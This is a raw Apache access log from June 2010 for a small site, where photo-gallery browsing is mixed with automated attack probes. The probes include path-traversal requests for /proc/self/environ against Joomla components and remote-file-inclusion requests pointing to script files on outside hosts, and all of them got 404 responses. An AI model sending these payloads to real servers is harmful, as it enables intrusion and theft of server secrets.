212.68.62.5 - - [01/Jun/2010:02:47:14 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:47:26 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:47:32 -0500] "GET /logs/access_log.1274832000//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:47:33 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:47:33 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:48:13 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
122.171.4.43 - - [01/Jun/2010:02:48:36 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
204.232.202.236 - - [01/Jun/2010:02:49:47 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:02:49:47 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:02:49:47 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:02:49:50 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:02:49:50 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:02:49:50 -0500] "GET /logs/access_log.1273017600%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:03 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:03 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:03 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:10 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:10 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
114.200.199.236 - - [01/Jun/2010:02:51:11 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:22 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:22 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:23 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:25 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:26 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
114.108.177.125 - - [01/Jun/2010:02:51:27 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:02:52:38 -0500] "GET /logs/access_log.1177113600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
120.50.40.133 - - [01/Jun/2010:02:52:43 -0500] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:52:48 -0500] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:23 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:23 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:26 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:53:27 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
212.68.62.5 - - [01/Jun/2010:02:55:38 -0500] "GET /logs/access_log.1274832000//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:55:38 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:55:39 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
122.171.4.43 - - [01/Jun/2010:02:57:06 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:07 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.1" 200 17492 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:07 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.1" 200 17209 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:07 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.1" 200 16386 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:07 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.1" 200 17534 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:08 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.1" 200 16029 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:09 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.1" 200 15860 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:09 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.1" 200 19168 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:09 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.1" 200 18119 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:09 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:09 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:10 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:10 -0500] "GET /costume/costume80.JPG HTTP/1.1" 200 67426 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
207.46.199.39 - - [01/Jun/2010:02:57:27 -0500] "GET /logs/access_log.1208649600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
122.171.4.43 - - [01/Jun/2010:02:57:39 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:40 -0500] "GET /costume/costume61%20copy.JPG HTTP/1.1" 200 18054 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:41 -0500] "GET /costume/costume62%20copy.JPG HTTP/1.1" 200 16357 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:41 -0500] "GET /costume/costume63%20copy.JPG HTTP/1.1" 200 17743 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:41 -0500] "GET /costume/costume64%20copy.JPG HTTP/1.1" 200 16453 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:41 -0500] "GET /costume/costume65%20copy.JPG HTTP/1.1" 200 18435 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:42 -0500] "GET /costume/costume66%20copy.JPG HTTP/1.1" 200 17118 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:42 -0500] "GET /costume/costume67%20copy.JPG HTTP/1.1" 200 17016 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:42 -0500] "GET /costume/costume68%20copy.JPG HTTP/1.1" 200 17278 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:42 -0500] "GET /costume/costume69%20copy.JPG HTTP/1.1" 200 16551 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:43 -0500] "GET /costume/costume71%20copy.JPG HTTP/1.1" 200 15824 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:43 -0500] "GET /costume/costume72%20copy.JPG HTTP/1.1" 200 17645 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:43 -0500] "GET /costume/costume70.JPG HTTP/1.1" 200 60587 "http://tomdolan.pconline.com/costume/thmb6.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:58 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:57:59 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:00 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:00 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:00 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:02 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:02 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:02 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:05 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:05 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:05 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
118.129.166.213 - - [01/Jun/2010:02:58:05 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
122.171.4.43 - - [01/Jun/2010:02:58:06 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:07 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:32 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:33 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:34 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:34 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:35 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:36 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:36 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:37 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:38 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:38 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:38 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:40 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
118.129.166.213 - - [01/Jun/2010:02:58:40 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.127.70.140 - - [01/Jun/2010:02:58:50 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
122.171.4.43 - - [01/Jun/2010:02:58:54 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:55 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.1" 200 48186 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:55 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 200 46929 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:56 -0500] "GET /costume/027_JPG%20copy.jpg HTTP/1.1" 200 46009 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:56 -0500] "GET /costume/028_JPG%20copy.jpg HTTP/1.1" 200 51488 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:56 -0500] "GET /costume/029_JPG%20copy.jpg HTTP/1.1" 200 47959 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:57 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.1" 200 44271 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:59 -0500] "GET /costume/032_JPG%20copy.jpg HTTP/1.1" 200 46966 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:58:59 -0500] "GET /costume/030_JPG%20copy.jpg HTTP/1.1" 200 45745 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
